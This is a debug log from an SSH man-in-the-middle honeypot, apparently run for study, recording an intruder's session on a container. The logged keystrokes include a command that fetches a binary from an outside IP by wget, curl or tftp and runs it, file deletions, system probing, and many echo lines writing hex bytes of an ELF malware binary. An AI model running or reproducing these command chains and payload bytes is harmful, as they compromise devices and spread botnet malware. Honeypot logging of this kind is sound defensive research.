
{"level":"error","message":"Forever detected script was killed by signal: SIGKILL"}
(node:2397613) Warning: Accessing non-existent property 'padLevels' of module exports inside circular dependency
(Use `node --trace-warnings ...` to show where the warning was created)
Started with the following options:
{
  debug: true,
  mitmIp: '10.0.3.1',
  autoAccess: true,
  autoAccessCache: 5000,
  maxAttemptsPerConnection: 6,
  sshServerIdentifier: 'SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2',
  containerMountPathPrefix: '/var/lib/lxc',
  containerMountPathSuffix: 'rootfs/',
  loggingAttackerStreams: '/home/student/MITM/logs/session_streams',
  loggingAuthenticationAttempts: '/home/student/MITM/logs/authentication_attempts',
  loggingLogins: '/home/student/MITM/logs/logins',
  loggingKeystrokes: '/home/student/MITM/logs/keystrokes',
  containerName: 'DATABASE_1',
  containerIp: '10.0.3.62',
  mitmPort: 1000,
  autoAccessFixed: 1
}
2022-10-22 20:47:15.277 - [Info] MITM Version: 2
2022-10-22 20:47:15.279 - [Info] Auto Access Enabled: true
2022-10-22 20:47:15.279 - [Debug] [Init] Auto Access Theshold Achieved: false
2022-10-22 20:47:15.285 - [Info] SSH man-in-the-middle server for 10.0.3.62 listening on 10.0.3.1:1000
2022-10-22 20:50:29.816 - [Debug] [Connection] Attacker connected: 185.196.220.81 | Client Identification: SSH-2.0-libssh2_1.9.0_DEV
2022-10-22 20:50:30.386 - [Debug] [Auth] Attacker 185.196.220.81 trying to authenticate with 'password'
2022-10-22 20:50:30.387 - [Debug] [Auto Access] Attacker: 185.196.220.81, Threshold: 1, Attempts: 1
2022-10-22 20:50:30.387 - [Debug] [Auto Access] Compromising the honeypot
2022-10-22 20:50:30.387 - [Debug] [Auto Access] Adding the following credentials: 'admin:admin'
2022-10-22 20:50:30.512 - [Debug] [Auto Access] Auto-access is now disabled for the remainder of this MITM server instance
2022-10-22 20:50:30.514 - [Debug] [Auth] Valid credentials - Password Authentication
2022-10-22 20:50:30.514 - [Debug] [LXC] Attempting to connect to the honeypot: 10.0.3.62
2022-10-22 20:50:30.573 - [Debug] [LXC-Auth] Attacker authenticated and is inside container
2022-10-22 20:50:31.014 - [Debug] [SHELL] Opened shell for attacker
2022-10-22 20:50:31.019 - [Debug] [LXC Streams] New Stream | Total Streams: 1
2022-10-22 20:50:31.229 - [Debug] [SHELL] Attacker Keystroke: enable[LF]
2022-10-22 20:50:31.231 - [Debug] [SHELL] line from reader: enable
2022-10-22 20:50:31.231 - [Debug] [SHELL] Keystroke buffer: 101,110,97,98,108,101,10
2022-10-22 20:50:31.314 - [Debug] [SHELL] Attacker Keystroke: system[LF]
2022-10-22 20:50:31.315 - [Debug] [SHELL] line from reader: system
2022-10-22 20:50:31.315 - [Debug] [SHELL] Keystroke buffer: 115,121,115,116,101,109,10
2022-10-22 20:50:31.316 - [Debug] [SHELL] Attacker Keystroke: shell[LF]
2022-10-22 20:50:31.316 - [Debug] [SHELL] line from reader: shell
2022-10-22 20:50:31.316 - [Debug] [SHELL] Keystroke buffer: 115,104,101,108,108,10
2022-10-22 20:50:31.316 - [Debug] [SHELL] Attacker Keystroke: sh[LF]
2022-10-22 20:50:31.317 - [Debug] [SHELL] line from reader: sh
2022-10-22 20:50:31.318 - [Debug] [SHELL] Keystroke buffer: 115,104,10
2022-10-22 20:50:31.318 - [Debug] [SHELL] Attacker Keystroke: linuxshell[LF]
2022-10-22 20:50:31.318 - [Debug] [SHELL] line from reader: linuxshell
2022-10-22 20:50:31.319 - [Debug] [SHELL] Keystroke buffer: 108,105,110,117,120,115,104,101,108,108,10
2022-10-22 20:50:31.319 - [Debug] [SHELL] Attacker Keystroke: cd[Space]/tmp/;[Space]echo[Space]"senpai"[Space]>[Space]rootsenpai;[Space]cat[Space]rootsenpai;[Space]rm[Space]-rf[Space]rootsenpai[LF]
2022-10-22 20:50:31.324 - [Debug] [SHELL] line from reader: cd /tmp/; echo "senpai" > rootsenpai; cat rootsenpai; rm -rf rootsenpai
2022-10-22 20:50:31.324 - [Debug] [SHELL] Keystroke buffer: 99,100,32,47,116,109,112,47,59,32,101,99,104,111,32,34,115,101,110,112,97,105,34,32,62,32,114,111,111,116,115,101,110,112,97,105,59,32,99,97,116,32,114,111,111,116,115,101,110,112,97,105,59,32,114,109,32,45,114,102,32,114,111,111,116,115,101,110,112,97,105,10
2022-10-22 20:50:31.448 - [Debug] [SHELL] Attacker Keystroke: rm[Space]-rf[Space]shr;[Space]wget[Space]http://46.23.109.47/shr[Space]||[Space]curl[Space]-O[Space]http://46.23.109.47/shr[Space]||[Space]tftp[Space]46.23.109.47[Space]-c[Space]get[Space]shr[Space]||[Space]tftp[Space]-g[Space]-r[Space]shr[Space]46.23.109.47;[Space]chmod[Space]777[Space]shr;./shr[Space]ssh;[Space]rm[Space]-rf[Space]shr[LF]
2022-10-22 20:50:31.470 - [Debug] [SHELL] line from reader: rm -rf shr; wget http://46.23.109.47/shr || curl -O http://46.23.109.47/shr || tftp 46.23.109.47 -c get shr || tftp -g -r shr 46.23.109.47; chmod 777 shr;./shr ssh; rm -rf shr
2022-10-22 20:50:31.471 - [Debug] [SHELL] Keystroke buffer: 114,109,32,45,114,102,32,115,104,114,59,32,119,103,101,116,32,104,116,116,112,58,47,47,52,54,46,50,51,46,49,48,57,46,52,55,47,115,104,114,32,124,124,32,99,117,114,108,32,45,79,32,104,116,116,112,58,47,47,52,54,46,50,51,46,49,48,57,46,52,55,47,115,104,114,32,124,124,32,116,102,116,112,32,52,54,46,50,51,46,49,48,57,46,52,55,32,45,99,32,103,101,116,32,115,104,114,32,124,124,32,116,102,116,112,32,45,103,32,45,114,32,115,104,114,32,52,54,46,50,51,46,49,48,57,46,52,55,59,32,99,104,109,111,100,32,55,55,55,32,115,104,114,59,46,47,115,104,114,32,115,115,104,59,32,114,109,32,45,114,102,32,115,104,114,10
2022-10-22 20:51:01.774 - [Debug] [SHELL] Attacker Keystroke: rm[Space]-rf[Space]gay;[Space]rm[Space]-rf[Space]mioriloli[LF]
2022-10-22 20:51:01.776 - [Debug] [SHELL] line from reader: rm -rf gay; rm -rf mioriloli
2022-10-22 20:51:01.777 - [Debug] [SHELL] Keystroke buffer: 114,109,32,45,114,102,32,103,97,121,59,32,114,109,32,45,114,102,32,109,105,111,114,105,108,111,108,105,10
2022-10-22 20:51:01.861 - [Debug] [SHELL] Attacker Keystroke: cat[Space]/proc/cpuinfo[Space]||[Space]while[Space]read[Space]i;[Space]do[Space]echo[Space]$i;[Space]done[Space]<[Space]/proc/cpuinfo[LF]
2022-10-22 20:51:01.862 - [Debug] [SHELL] line from reader: cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo
2022-10-22 20:51:01.862 - [Debug] [SHELL] Keystroke buffer: 99,97,116,32,47,112,114,111,99,47,99,112,117,105,110,102,111,32,124,124,32,119,104,105,108,101,32,114,101,97,100,32,105,59,32,100,111,32,101,99,104,111,32,36,105,59,32,100,111,110,101,32,60,32,47,112,114,111,99,47,99,112,117,105,110,102,111,10
2022-10-22 20:51:31.807 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00\x00\x00\x01\x00\x40\x04\xc0\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.811 - [Debug] [SHELL] line from reader: echo -ne "\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00\x00\x00\x01\x00\x40\x04\xc0\x00\x00\x00" >> gay
2022-10-22 20:51:31.811 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,55,102,92,120,52,53,92,120,52,99,92,120,52,54,92,120,48,49,92,120,48,50,92,120,48,49,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,50,92,120,48,48,92,120,48,56,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,49,92,120,48,48,92,120,52,48,92,120,48,52,92,120,99,48,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.811 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x34\x00\x00\x06\xb8\x00\x00\x10\x07\x00\x34\x00\x20\x00\x03\x00\x28\x00\x07\x00\x06\x00\x00\x00\x01\x00\x00\x00\x00\x00\x40\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.814 - [Debug] [SHELL] line from reader: echo -ne "\x34\x00\x00\x06\xb8\x00\x00\x10\x07\x00\x34\x00\x20\x00\x03\x00\x28\x00\x07\x00\x06\x00\x00\x00\x01\x00\x00\x00\x00\x00\x40\x00" >> gay
2022-10-22 20:51:31.815 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,51,52,92,120,48,48,92,120,48,48,92,120,48,54,92,120,98,56,92,120,48,48,92,120,48,48,92,120,49,48,92,120,48,55,92,120,48,48,92,120,51,52,92,120,48,48,92,120,50,48,92,120,48,48,92,120,48,51,92,120,48,48,92,120,50,56,92,120,48,48,92,120,48,55,92,120,48,48,92,120,48,54,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,49,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,52,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.815 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x00\x40\x00\x00\x00\x00\x06\x2c\x00\x00\x06\x2c\x00\x00\x00\x05\x00\x01\x00\x00\x00\x00\x00\x01\x00\x00\x06\x30\x00\x44\x06"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.819 - [Debug] [SHELL] line from reader: echo -ne "\x00\x00\x40\x00\x00\x00\x00\x06\x2c\x00\x00\x06\x2c\x00\x00\x00\x05\x00\x01\x00\x00\x00\x00\x00\x01\x00\x00\x06\x30\x00\x44\x06" >> gay
2022-10-22 20:51:31.819 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,48,48,92,120,52,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,54,92,120,50,99,92,120,48,48,92,120,48,48,92,120,48,54,92,120,50,99,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,53,92,120,48,48,92,120,48,49,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,49,92,120,48,48,92,120,48,48,92,120,48,54,92,120,51,48,92,120,48,48,92,120,52,52,92,120,48,54,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.819 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x30\x00\x44\x06\x30\x00\x00\x00\x54\x00\x00\x00\x70\x00\x00\x00\x06\x00\x01\x00\x00\x64\x74\xe5\x51\x00\x00\x00\x00\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.822 - [Debug] [SHELL] line from reader: echo -ne "\x30\x00\x44\x06\x30\x00\x00\x00\x54\x00\x00\x00\x70\x00\x00\x00\x06\x00\x01\x00\x00\x64\x74\xe5\x51\x00\x00\x00\x00\x00\x00\x00" >> gay
2022-10-22 20:51:31.823 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,51,48,92,120,48,48,92,120,52,52,92,120,48,54,92,120,51,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,53,52,92,120,48,48,92,120,48,48,92,120,48,48,92,120,55,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,54,92,120,48,48,92,120,48,49,92,120,48,48,92,120,48,48,92,120,54,52,92,120,55,52,92,120,101,53,92,120,53,49,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.823 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.827 - [Debug] [SHELL] line from reader: echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" >> gay
2022-10-22 20:51:31.827 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,55,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,52,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.828 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x30\xa5\x00\xff\x00\x05\x2c\x00\x00\x04\x26\x00\x00\x85\x20\x25\x30\xc2\x00\xff\x30\xe7\x00\xff\x00\x87\x20\x25\x00\x02\x12"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.831 - [Debug] [SHELL] line from reader: echo -ne "\x00\x30\xa5\x00\xff\x00\x05\x2c\x00\x00\x04\x26\x00\x00\x85\x20\x25\x30\xc2\x00\xff\x30\xe7\x00\xff\x00\x87\x20\x25\x00\x02\x12" >> gay
2022-10-22 20:51:31.831 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,51,48,92,120,97,53,92,120,48,48,92,120,102,102,92,120,48,48,92,120,48,53,92,120,50,99,92,120,48,48,92,120,48,48,92,120,48,52,92,120,50,54,92,120,48,48,92,120,48,48,92,120,56,53,92,120,50,48,92,120,50,53,92,120,51,48,92,120,99,50,92,120,48,48,92,120,102,102,92,120,51,48,92,120,101,55,92,120,48,48,92,120,102,102,92,120,48,48,92,120,56,55,92,120,50,48,92,120,50,53,92,120,48,48,92,120,48,50,92,120,49,50,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.831 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x03\xe0\x00\x08\x00\x44\x10\x25\x3c\x1c\x00\x05\x27\x9c\x85\x58\x03\x99\xe0\x21\x8f\x99\x80\x5c\x00\x80\x28\x21\x03\x20\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.835 - [Debug] [SHELL] line from reader: echo -ne "\x00\x03\xe0\x00\x08\x00\x44\x10\x25\x3c\x1c\x00\x05\x27\x9c\x85\x58\x03\x99\xe0\x21\x8f\x99\x80\x5c\x00\x80\x28\x21\x03\x20\x00" >> gay
2022-10-22 20:51:31.836 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,48,51,92,120,101,48,92,120,48,48,92,120,48,56,92,120,48,48,92,120,52,52,92,120,49,48,92,120,50,53,92,120,51,99,92,120,49,99,92,120,48,48,92,120,48,53,92,120,50,55,92,120,57,99,92,120,56,53,92,120,53,56,92,120,48,51,92,120,57,57,92,120,101,48,92,120,50,49,92,120,56,102,92,120,57,57,92,120,56,48,92,120,53,99,92,120,48,48,92,120,56,48,92,120,50,56,92,120,50,49,92,120,48,51,92,120,50,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.836 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x08\x24\x04\x0f\xa1\x3c\x1c\x00\x05\x27\x9c\x85\x3c\x03\x99\xe0\x21\x8f\x99\x80\x5c\x00\x80\x28\x21\x03\x20\x00\x08\x24\x04\x0f"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.840 - [Debug] [SHELL] line from reader: echo -ne "\x08\x24\x04\x0f\xa1\x3c\x1c\x00\x05\x27\x9c\x85\x3c\x03\x99\xe0\x21\x8f\x99\x80\x5c\x00\x80\x28\x21\x03\x20\x00\x08\x24\x04\x0f" >> gay
2022-10-22 20:51:31.840 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,56,92,120,50,52,92,120,48,52,92,120,48,102,92,120,97,49,92,120,51,99,92,120,49,99,92,120,48,48,92,120,48,53,92,120,50,55,92,120,57,99,92,120,56,53,92,120,51,99,92,120,48,51,92,120,57,57,92,120,101,48,92,120,50,49,92,120,56,102,92,120,57,57,92,120,56,48,92,120,53,99,92,120,48,48,92,120,56,48,92,120,50,56,92,120,50,49,92,120,48,51,92,120,50,48,92,120,48,48,92,120,48,56,92,120,50,52,92,120,48,52,92,120,48,102,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.840 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\xa6\x3c\x1c\x00\x05\x27\x9c\x85\x20\x03\x99\xe0\x21\x00\xa0\x10\x21\x8f\x99\x80\x5c\x00\xc0\x38\x21\x00\x80\x28\x21\x00\x40\x30"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.844 - [Debug] [SHELL] line from reader: echo -ne "\xa6\x3c\x1c\x00\x05\x27\x9c\x85\x20\x03\x99\xe0\x21\x00\xa0\x10\x21\x8f\x99\x80\x5c\x00\xc0\x38\x21\x00\x80\x28\x21\x00\x40\x30" >> gay
2022-10-22 20:51:31.844 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,97,54,92,120,51,99,92,120,49,99,92,120,48,48,92,120,48,53,92,120,50,55,92,120,57,99,92,120,56,53,92,120,50,48,92,120,48,51,92,120,57,57,92,120,101,48,92,120,50,49,92,120,48,48,92,120,97,48,92,120,49,48,92,120,50,49,92,120,56,102,92,120,57,57,92,120,56,48,92,120,53,99,92,120,48,48,92,120,99,48,92,120,51,56,92,120,50,49,92,120,48,48,92,120,56,48,92,120,50,56,92,120,50,49,92,120,48,48,92,120,52,48,92,120,51,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.845 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x21\x03\x20\x00\x08\x24\x04\x0f\xa5\x3c\x1c\x00\x05\x27\x9c\x84\xf8\x03\x99\xe0\x21\x27\xbd\xff\xd0\xaf\xbf\x00\x28\xaf\xbc\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.852 - [Debug] [SHELL] line from reader: echo -ne "\x21\x03\x20\x00\x08\x24\x04\x0f\xa5\x3c\x1c\x00\x05\x27\x9c\x84\xf8\x03\x99\xe0\x21\x27\xbd\xff\xd0\xaf\xbf\x00\x28\xaf\xbc\x00" >> gay
2022-10-22 20:51:31.852 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,50,49,92,120,48,51,92,120,50,48,92,120,48,48,92,120,48,56,92,120,50,52,92,120,48,52,92,120,48,102,92,120,97,53,92,120,51,99,92,120,49,99,92,120,48,48,92,120,48,53,92,120,50,55,92,120,57,99,92,120,56,52,92,120,102,56,92,120,48,51,92,120,57,57,92,120,101,48,92,120,50,49,92,120,50,55,92,120,98,100,92,120,102,102,92,120,100,48,92,120,97,102,92,120,98,102,92,120,48,48,92,120,50,56,92,120,97,102,92,120,98,99,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.852 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x10\x8f\x99\x80\x5c\xaf\xa4\x00\x18\xaf\xa5\x00\x1c\xaf\xa6\x00\x20\x24\x04\x10\x06\x27\xa6\x00\x18\x03\x20\xf8\x09\x24\x05\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.856 - [Debug] [SHELL] line from reader: echo -ne "\x10\x8f\x99\x80\x5c\xaf\xa4\x00\x18\xaf\xa5\x00\x1c\xaf\xa6\x00\x20\x24\x04\x10\x06\x27\xa6\x00\x18\x03\x20\xf8\x09\x24\x05\x00" >> gay
2022-10-22 20:51:31.856 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,49,48,92,120,56,102,92,120,57,57,92,120,56,48,92,120,53,99,92,120,97,102,92,120,97,52,92,120,48,48,92,120,49,56,92,120,97,102,92,120,97,53,92,120,48,48,92,120,49,99,92,120,97,102,92,120,97,54,92,120,48,48,92,120,50,48,92,120,50,52,92,120,48,52,92,120,49,48,92,120,48,54,92,120,50,55,92,120,97,54,92,120,48,48,92,120,49,56,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,50,52,92,120,48,53,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.856 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x03\x8f\xbc\x00\x10\x8f\xbf\x00\x28\x00\x00\x00\x00\x03\xe0\x00\x08\x27\xbd\x00\x30\x3c\x1c\x00\x05\x27\x9c\x84\xac\x03\x99\xe0"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.862 - [Debug] [SHELL] line from reader: echo -ne "\x03\x8f\xbc\x00\x10\x8f\xbf\x00\x28\x00\x00\x00\x00\x03\xe0\x00\x08\x27\xbd\x00\x30\x3c\x1c\x00\x05\x27\x9c\x84\xac\x03\x99\xe0" >> gay
2022-10-22 20:51:31.862 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,51,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,56,102,92,120,98,102,92,120,48,48,92,120,50,56,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,51,92,120,101,48,92,120,48,48,92,120,48,56,92,120,50,55,92,120,98,100,92,120,48,48,92,120,51,48,92,120,51,99,92,120,49,99,92,120,48,48,92,120,48,53,92,120,50,55,92,120,57,99,92,120,56,52,92,120,97,99,92,120,48,51,92,120,57,57,92,120,101,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.862 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x21\x00\xa0\x10\x21\x8f\x99\x80\x5c\x00\xc0\x38\x21\x00\x80\x28\x21\x00\x40\x30\x21\x03\x20\x00\x08\x24\x04\x0f\xa4\x3c\x1c\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.870 - [Debug] [SHELL] line from reader: echo -ne "\x21\x00\xa0\x10\x21\x8f\x99\x80\x5c\x00\xc0\x38\x21\x00\x80\x28\x21\x00\x40\x30\x21\x03\x20\x00\x08\x24\x04\x0f\xa4\x3c\x1c\x00" >> gay
2022-10-22 20:51:31.870 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,50,49,92,120,48,48,92,120,97,48,92,120,49,48,92,120,50,49,92,120,56,102,92,120,57,57,92,120,56,48,92,120,53,99,92,120,48,48,92,120,99,48,92,120,51,56,92,120,50,49,92,120,48,48,92,120,56,48,92,120,50,56,92,120,50,49,92,120,48,48,92,120,52,48,92,120,51,48,92,120,50,49,92,120,48,51,92,120,50,48,92,120,48,48,92,120,48,56,92,120,50,52,92,120,48,52,92,120,48,102,92,120,97,52,92,120,51,99,92,120,49,99,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.870 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x05\x27\x9c\x84\x84\x03\x99\xe0\x21\x00\xa0\x10\x21\x8f\x99\x80\x5c\x00\xc0\x38\x21\x00\x80\x28\x21\x00\x40\x30\x21\x03\x20\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.874 - [Debug] [SHELL] line from reader: echo -ne "\x05\x27\x9c\x84\x84\x03\x99\xe0\x21\x00\xa0\x10\x21\x8f\x99\x80\x5c\x00\xc0\x38\x21\x00\x80\x28\x21\x00\x40\x30\x21\x03\x20\x00" >> gay
2022-10-22 20:51:31.874 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,53,92,120,50,55,92,120,57,99,92,120,56,52,92,120,56,52,92,120,48,51,92,120,57,57,92,120,101,48,92,120,50,49,92,120,48,48,92,120,97,48,92,120,49,48,92,120,50,49,92,120,56,102,92,120,57,57,92,120,56,48,92,120,53,99,92,120,48,48,92,120,99,48,92,120,51,56,92,120,50,49,92,120,48,48,92,120,56,48,92,120,50,56,92,120,50,49,92,120,48,48,92,120,52,48,92,120,51,48,92,120,50,49,92,120,48,51,92,120,50,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.874 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x08\x24\x04\x0f\xa3\x3c\x1c\x00\x05\x27\x9c\x84\x5c\x03\x99\xe0\x21\x27\xbd\xff\xd0\xaf\xbf\x00\x28\xaf\xbc\x00\x10\x8f\x99\x80"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.877 - [Debug] [SHELL] line from reader: echo -ne "\x08\x24\x04\x0f\xa3\x3c\x1c\x00\x05\x27\x9c\x84\x5c\x03\x99\xe0\x21\x27\xbd\xff\xd0\xaf\xbf\x00\x28\xaf\xbc\x00\x10\x8f\x99\x80" >> gay
2022-10-22 20:51:31.877 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,56,92,120,50,52,92,120,48,52,92,120,48,102,92,120,97,51,92,120,51,99,92,120,49,99,92,120,48,48,92,120,48,53,92,120,50,55,92,120,57,99,92,120,56,52,92,120,53,99,92,120,48,51,92,120,57,57,92,120,101,48,92,120,50,49,92,120,50,55,92,120,98,100,92,120,102,102,92,120,100,48,92,120,97,102,92,120,98,102,92,120,48,48,92,120,50,56,92,120,97,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,56,102,92,120,57,57,92,120,56,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.877 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x5c\xaf\xa4\x00\x18\xaf\xa5\x00\x1c\xaf\xa6\x00\x20\x24\x04\x10\x06\x27\xa6\x00\x18\x03\x20\xf8\x09\x24\x05\x00\x01\x8f\xbc\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.883 - [Debug] [SHELL] line from reader: echo -ne "\x5c\xaf\xa4\x00\x18\xaf\xa5\x00\x1c\xaf\xa6\x00\x20\x24\x04\x10\x06\x27\xa6\x00\x18\x03\x20\xf8\x09\x24\x05\x00\x01\x8f\xbc\x00" >> gay
2022-10-22 20:51:31.883 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,53,99,92,120,97,102,92,120,97,52,92,120,48,48,92,120,49,56,92,120,97,102,92,120,97,53,92,120,48,48,92,120,49,99,92,120,97,102,92,120,97,54,92,120,48,48,92,120,50,48,92,120,50,52,92,120,48,52,92,120,49,48,92,120,48,54,92,120,50,55,92,120,97,54,92,120,48,48,92,120,49,56,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,50,52,92,120,48,53,92,120,48,48,92,120,48,49,92,120,56,102,92,120,98,99,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.883 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x10\x8f\xbf\x00\x28\x00\x00\x00\x00\x03\xe0\x00\x08\x27\xbd\x00\x30\x3c\x1c\x00\x05\x27\x9c\x84\x10\x03\x99\xe0\x21\x27\xbd\xff"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.889 - [Debug] [SHELL] line from reader: echo -ne "\x10\x8f\xbf\x00\x28\x00\x00\x00\x00\x03\xe0\x00\x08\x27\xbd\x00\x30\x3c\x1c\x00\x05\x27\x9c\x84\x10\x03\x99\xe0\x21\x27\xbd\xff" >> gay
2022-10-22 20:51:31.890 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,49,48,92,120,56,102,92,120,98,102,92,120,48,48,92,120,50,56,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,51,92,120,101,48,92,120,48,48,92,120,48,56,92,120,50,55,92,120,98,100,92,120,48,48,92,120,51,48,92,120,51,99,92,120,49,99,92,120,48,48,92,120,48,53,92,120,50,55,92,120,57,99,92,120,56,52,92,120,49,48,92,120,48,51,92,120,57,57,92,120,101,48,92,120,50,49,92,120,50,55,92,120,98,100,92,120,102,102,34,32,62,62,32,103,97,121,10
2022-10-22 20:51:31.890 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x38\xaf\xbf\x00\xc0\xaf\xb3\x00\xbc\xaf\xb2\x00\xb8\xaf\xb1\x00\xb4\xaf\xb0\x00\xb0\xaf\xbc\x00\x10\x8f\x82\x80\x18\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 20:51:31.892 - [Debug] [SHELL] line from reader: echo -ne "\x38\xaf\xbf\x00\xc0\xaf\xb3\x00\xbc\xaf\xb2\x00\xb8\xaf\xb1\x00\xb4\xaf\xb0\x00\xb0\xaf\xbc\x00\x10\x8f\x82\x80\x18\x00\x00\x00" >> gay
